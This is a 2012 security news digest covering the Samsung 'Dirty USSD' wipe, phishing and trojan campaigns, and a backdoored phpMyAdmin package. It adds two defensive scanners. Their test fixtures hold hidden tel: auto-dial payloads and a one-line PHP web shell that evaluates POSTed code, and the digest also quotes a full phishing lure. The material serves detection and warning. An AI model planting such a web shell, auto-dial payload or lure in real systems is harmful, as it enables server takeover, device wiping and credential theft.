NEWS - September 25, 2012

'Dirty USSD' Hack Wipes Samsung Phones. Is Yours Vulnerable?

If you own a Samsung smartphone from a U.S. cell phone operator, you may want to avoid using the Internet until your carrier patches a pretty simple flaw that would let an attacker reset your phone.

On Tuesday, researcher Ravi Borgaonkar demonstrated how he wiped out a Samsung Galaxy SIII simply by opening a website containing an HTML tag for a call function, and replacing the telephone number with the USSD code for a factory reset. USSD codes are commands that are executed by entering them in your keypad—for instance if you dial *#*#INFO#*#* you can access certain menu settings. For every Samsung phone running TouchWiz, there's a unique set of USSD codes that performs various commands.

The problem appears to lie within both the Samsung dialer and TouchWiz's stock Android browser. Unlike most dialers, Samsung's automatically makes the call while others still require the user to hit "send." Borgaonkar noted that the code can be sent from a website or pushed to the handset by a Charlie Miller-like NFC attack, or through a malicious QR code, in which case absolutely no user interaction is necessary.

But here's the kicker.

Continued :

Remote resetting a Samsung phone made easy
Researcher shows Samsung Galaxy S3 remote data-wipe hack
Samsung Galaxy S3 'vulnerable' to remote malicious reset
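The post describes the delivery mechanism (a call link whose "number" is a USSD code, auto-dialed by the handset) but not how to spot such a page. The following is an added example, not code from the CNET article or from Borgaonkar's demonstration: a small Python scanner that pulls every tel: target out of an HTML document (anchors, hidden iframes, meta refresh) and flags those whose payload uses MMI/USSD syntax (* and # characters) rather than a phone number. The factory-reset code itself is deliberately not included; the sample page, the regexes and the function names are all constructed for this example.

```python
"""Flag tel: links in HTML that carry a USSD/MMI code instead of a phone number.

Added example (not from the article). The attack described in the post relies on
a dialer auto-dialing a tel: URI; this scanner does not dial anything, it only
reports tel: targets whose payload looks like a USSD/MMI code.
"""
import re
from html.parser import HTMLParser
from urllib.parse import unquote

# MMI/USSD-style payload: starts with * or #, then only digits, * and #.
USSD_RE = re.compile(r"^[*#][0-9*#]+$")
# Ordinary phone number: optional +, digits and common separators.
PHONE_RE = re.compile(r"^\+?[0-9][0-9 .()-]*$")


class TelLinkCollector(HTMLParser):
    """Collects tel: targets from any attribute, plus meta refresh redirects."""

    def __init__(self):
        super().__init__()
        self.targets = []

    def handle_starttag(self, tag, attrs):
        for name, value in attrs:
            if value is None:
                continue
            v = value.strip()
            # <meta http-equiv="refresh" content="0; url=tel:..."> loads with no click.
            if tag == "meta" and name == "content":
                m = re.search(r"url\s*=\s*(tel:[^\s\"']+)", v, re.I)
                if m:
                    v = m.group(1)
            if v.lower().startswith("tel:"):
                self.targets.append(v)


def classify_tel(uri):
    """Return 'ussd', 'phone' or 'other' for a tel: URI (percent-decoded first)."""
    number = unquote(uri[4:]).strip()
    if USSD_RE.match(number):
        return "ussd"
    if PHONE_RE.match(number):
        return "phone"
    return "other"


def find_ussd_links(page_html):
    """Return the tel: targets in page_html whose payload is USSD/MMI-style."""
    collector = TelLinkCollector()
    collector.feed(page_html)
    return [t for t in collector.targets if classify_tel(t) == "ussd"]


# Constructed sample page: one legitimate tel: link, a link to the Android
# *#*#4636#*#* (INFO) test menu, a hidden iframe and a meta refresh that would
# hit the dialer without any click. '#' is percent-encoded as %23 in URIs.
SAMPLE_PAGE = """
<html><body>
<a href="tel:+1-555-0100">Call support</a>
<a href="tel:*%23*%234636%23*%23*">info menu</a>
<iframe src="tel:*%2312345%23" style="display:none"></iframe>
<meta http-equiv="refresh" content="0; url=tel:%2306%23">
</body></html>
"""

if __name__ == "__main__":
    for target in find_ussd_links(SAMPLE_PAGE):
        print("suspicious tel: target:", target)
```

Run against a saved page, the scanner reports the three USSD-style targets and ignores the real phone number. The regexes are intentionally broad: any tel: payload built from * and # deserves a look, whatever the specific code does on a given handset.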
Microsoft Windows Update emails try to steal your Gmail, Yahoo, AOL passwords...

Beware any emails which claim to come from Microsoft - it could be that you're being targeted in an attack designed to steal your AOL, Gmail, Yahoo or Windows Live password.

At first glance, if you don't look too carefully, the emails entitled "Microsoft Windows Update" may appear harmless enough. But the grammatical errors and occasional odd language should raise alarm bells that the emails may not really be from Microsoft. [Screenshot]

Dear Windows User,
It has come to our attention that your Microsoft windows Installation records are out of date. Every Windows installation has to be tied to an email account for daily update.

This requires you to verify the Email Account. Failure to verify your records will result in account suspension. Click on the Verify button below and enter your login information on the following page to confirm your records.


Thank you,

Microsoft Windows Team.

If you do make the mistake of clicking on the link you are taken to a third party website (not the real Microsoft site), where you are warned that your computer is at high risk and told to choose between logging in via Gmail, Windows Live, Yahoo or AOL. [Screenshot]

Continued :
Espionage Hackers Target 'Watering Hole' Sites

Security experts are accustomed to direct attacks, but some of today's more insidious incursions succeed in a roundabout way — by planting malware at sites deemed most likely to be visited by the targets of interest. New research suggests these so-called "watering hole" tactics recently have been used as stepping stones to conduct espionage attacks against a host of targets across a variety of industries, including the defense, government, academia, financial services, healthcare and utilities sectors.

Some of the earliest details of this trend came in late July 2012 from RSA FirstWatch, which warned of an increasingly common attack technique involving the compromise of legitimate websites specific to a geographic area which the attacker believes will be visited by end users who belong to the organization they wish to penetrate.

At the time, RSA declined to individually name the Web sites used in the attack. But the company shifted course somewhat after researchers from Symantec this month published their own report on the trend (see The Elderwood Project). Taken together, the body of evidence supports multiple, strong connections between these recent watering hole attacks and the Aurora intrusions perpetrated in late 2009 against Google and a number of other high-profile targets.

Continued :

Also: Large-Scale Water Holing Attack Campaigns Hitting Key Targets

New Twitter-Based Malware Uses Direct Messaging to Spread

Sophos is warning of a new trick to get Twitter users to open direct messages from trusted users that ultimately infect their machines with malware.

In a blog post, senior technology consultant Graham Cluley said the initial message is a tweet claiming the recipient's been captured on a Facebook video. One version makes it sound like something scandalous was taped without the person's knowledge.

Click the link and a video player pops up with a warning that an update for Youtube Player is needed. But instead of FlashPlayerV10.1.57.108.exe, it's actually a backdoor Trojan that copies itself to accessible drives and network shares.

"Quite how users' Twitter accounts became compromised to send the malicious DMs in the first place isn't currently clear, but the attack underlines the importance of not automatically clicking on a link just because it appeared to be sent to you by a trusted friend," Cluley wrote.

"If you do find that it was your Twitter account sending out the messages, the sensible course of action is to assume the worst, change your password (make sure it is something unique, hard-to-guess and hard-to-crack) and revoke permissions of any suspicious applications that have access to your account."

Continued :

Apple fixes security vulnerabilities w/ Apple TV 5.1 update

Less than one week after iOS 6 arrived, Apple has released Update 5.1 for its 2nd and 3rd generation iOS-based Apple TV devices, adding several new features and closing a number of important security holes. According to Apple, Apple TV 5.1 addresses a total of 21 problems, some of which could be exploited by a remote attacker to, for example, cause a denial-of-service (DoS), determine which networks a device has previously accessed, or even execute arbitrary code on the device.

These include vulnerabilities in the LibXML library used by Apple TV, memory corruption problems in JavaScriptCore and the LibPNG library, a stack buffer overflow in ICU locale ID handling, an integer overflow, a double free bug in ImageIO's handling of JPEG images and a buffer overflow in the LibTIFF library. For an attack to be successful, a victim must connect to a malicious Wi-Fi network, or open a specially crafted movie or image file.

Continued :

Also: Apple TV vulnerabilities closed after being watched for months

See Vulnerabilities & Fixes - Apple TV Multiple Vulnerabilities

Facebook denies reports of major privacy breach despite user complaints

"Old private messages between Facebook users suddenly appear on viewable Timelines, according to several reports:

Facebook today denied news reports of a major privacy breach involving users who saw their private messages from 2009 and before suddenly appearing on their viewable Timeline as messages posted by their friends.

Users reported seeing their private messages, along with viewable wall posts appearing under the "Friends" box in Facebook's Timeline view, according to the news reports. This reporter's Facebook account did not appear to have the problem.

TechCrunch, one of the news sites that carried the story, reported receiving several emails from readers complaining about seeing their older private messages suddenly viewable to others.

The author of the TechCrunch story reported seeing the problem on her own Facebook page and on some of her friends' timelines as well. The issue has surfaced in the US and elsewhere, but does not appear to affect all Facebook users, according to TechCrunch.


Also: Despite statements from Facebook to the contrary, users are still claiming to see private messages in their Timelines
Fake 'KLM e-Ticket' attempts to install backdoor

From Websense Security:

Fake airline e-ticket emails containing malicious attachments are far from new. However, the Websense ThreatSeeker Network has detected a significant campaign purporting to originate from KLM, the Dutch flagship airline. We estimate we intercepted more than 850,000 messages from this campaign on Monday, September 17, alone.

Each malicious message, with a subject 'KLM e-Ticket', appears to use a legitimate KLM e-ticket layout, but itinerary information is not displayed. Instead, users are enticed to view the itinerary in an attachment and subsequently risk compromising their machines. Although this scam does not specifically target KLM customers, those who have made recent ticket purchases as well as recipients who may fear that an unauthorized credit card purchase has been made could fall victim. Websense customers are protected from this and other threats by ACE, our Advanced Classification Engine.

We analyzed a sample set of messages, and noted that each 'e-ticket' contained unique values in the passenger and receipt sections (presumably an attempt to avoid detection), along with a malicious zipped attachment named 'KLM-e-Ticket_<NumericalValue>.zip'. [Screenshot]

Continued :

Questions abound as malicious phpMyAdmin backdoor found on SourceForge site

"Secret code added to the package gives attackers the ability to hijack servers."

Developers of phpMyAdmin warned users they may be running a malicious version of the open-source software package after discovering backdoor code was snuck into a package being distributed over the widely used SourceForge repository.

The backdoor contains code that allows remote attackers to take control of the underlying server running the modified phpMyAdmin, which is a Web-based tool for managing MySQL databases. The PHP script is found in a file named server_sync.php, and it reads PHP code embedded in standard POST Web requests and then executes it. That allows anyone who knows the backdoor is present to execute code of his choice. HD Moore, CSO of Rapid7 and chief architect of the Metasploit exploit package for penetration testers and hackers, told Ars a module has already been added that tests for the vulnerability.

The backdoor is concerning because it was distributed on one of the official mirrors for SourceForge, which hosts more than 324,000 open-source projects, serves more than 46 million consumers, and handles more than four million downloads each day. SourceForge officials are still investigating the breach, so crucial questions remain unanswered. It's still unclear, for instance, if the compromised server hosted other maliciously modified software packages, if other official SourceForge mirror sites were also affected, and if the central repository that feeds these mirror sites might also have been attacked.

Continued :

Also: Malicious phpMyAdmin served from SourceForge mirror
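The article gives two concrete indicators an administrator can act on: the injected file is named server_sync.php, and it executes PHP code taken from POST request data. The following is an added example, not code from the phpMyAdmin project, Ars Technica or Rapid7: a Python scanner that walks an installation tree and flags the file by name and, more generally, any .php file that feeds request data into eval(). The sample tree it builds in a temporary directory is constructed for this example, and the stand-in backdoor body in it is a minimal illustration of the described behaviour, not the real injected code.

```python
"""Check a phpMyAdmin tree for the backdoor indicators described in the article.

Added example (not project code). Indicators used: the file name server_sync.php,
and eval() applied to $_POST / $_REQUEST / $_GET data in any PHP file.
"""
import os
import re
import tempfile

BACKDOOR_FILENAME = "server_sync.php"
# eval( ... $_POST[...] ... ) on one line, with optional wrapper calls such as
# stripslashes() or base64_decode() in between. Deliberately crude: it is a
# triage filter, and every hit should be read by hand.
EVAL_REQUEST_RE = re.compile(r"\beval\s*\([^;]*?\$_(?:POST|REQUEST|GET)\b", re.I)


def scan_php_tree(root):
    """Return [(relative_path, reason), ...] for suspicious files under root."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, root)
            if name == BACKDOOR_FILENAME:
                findings.append((rel, "file name matches known backdoor"))
            if not name.endswith(".php"):
                continue
            try:
                with open(path, encoding="utf-8", errors="replace") as fh:
                    for lineno, line in enumerate(fh, 1):
                        if EVAL_REQUEST_RE.search(line):
                            findings.append(
                                (rel, f"eval() of request data at line {lineno}"))
            except OSError:
                continue
    return findings


def build_sample_tree():
    """Constructed phpMyAdmin-like tree: two clean files plus a stand-in backdoor."""
    root = tempfile.mkdtemp(prefix="pma_")
    files = {
        "index.php": "<?php\nrequire 'libraries/common.inc.php';\n",
        "libraries/common.inc.php": "<?php\n$cfg = array();\n",
        # Stand-in for the injected file (constructed): evaluates POSTed PHP.
        "server_sync.php": (
            "<?php\n"
            "if (isset($_POST['c'])) { eval(stripslashes($_POST['c'])); }\n"
        ),
    }
    for rel, body in files.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w", encoding="utf-8") as fh:
            fh.write(body)
    return root


if __name__ == "__main__":
    for rel, reason in scan_php_tree(build_sample_tree()):
        print(f"{rel}: {reason}")
```

Point scan_php_tree() at the document root of a real installation instead of the constructed tree. A clean phpMyAdmin tree should produce no findings; the name match alone is enough reason to pull the package and compare it against a download from the project's own site rather than a mirror.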
